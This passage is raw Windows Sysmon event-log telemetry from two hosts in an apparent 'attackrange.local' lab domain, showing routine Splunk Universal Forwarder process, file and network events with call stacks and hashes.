21:51:03.147{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638760Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B864-6058-0500-00000000AF01}628644C:\Windows\system32\csrss.exe{BFB545BB-B447-605B-355A-00000000AF01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638759Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B447-605B-355A-00000000AF01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638758Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B447-605B-355A-00000000AF01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005918465Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.881{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=925D7814388B6C833888F901F3130127,SHA256=D0D1495F7879729F22690D8DD83BBF22E342EF41FCE5836347B9D09DC07BA719,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918464Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.794{896A638B-B447-605B-9769-00000000AE01}17167780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918463Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.751{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918462Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.751{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918461Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.651{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B447-605B-9769-00000000AE01}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918460Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.650{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918459Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.650{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918458Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.649{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918457Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.649{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918456Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.649{896A638B-B5C8-6058-0500-00000000AE01}396464C:\Windows\system32\csrss.exe{896A638B-B447-605B-9769-00000000AE01}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918455Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.649{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B447-605B-9769-00000000AE01}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918454Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.640{896A638B-B447-605B-9769-00000000AE01}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005918453Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.363{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8ECEB492D6FFD6DAD917EADCA1555F0,SHA256=ACABBDCB52868D4C30D4D41BFBAD7CCAA458903AEBD1BB6A864F949ABACD8BCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918452Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.145{896A638B-B446-605B-9669-00000000AE01}24167888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918451Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:03.002{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B446-605B-9669-00000000AE01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918450Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.999{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918449Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.999{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918448Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.999{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918447Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.999{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918446Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.999{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B446-605B-9669-00000000AE01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918445Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.998{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B446-605B-9669-00000000AE01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918444Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.868{896A638B-B446-605B-9669-00000000AE01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000638787Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:00.551{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57268-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638786Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:04.491{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=389959C1E47B7AC08D5972EB9D4844E6,SHA256=38602D31CED5723695D2AE79CFAEC6E357EF797F6CC054AC4C07221D6DE5AC3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638785Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:04.491{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B6E68DBBC1A61E3427259AC7D27E821,SHA256=A074EA4BE09ACF8C2260F7D72F752A41C23C5A914ED20B5746966E1F05D72F15,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918477Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.752{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918476Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.752{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918475Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.607{896A638B-B448-605B-9869-00000000AE01}80327964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918474Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 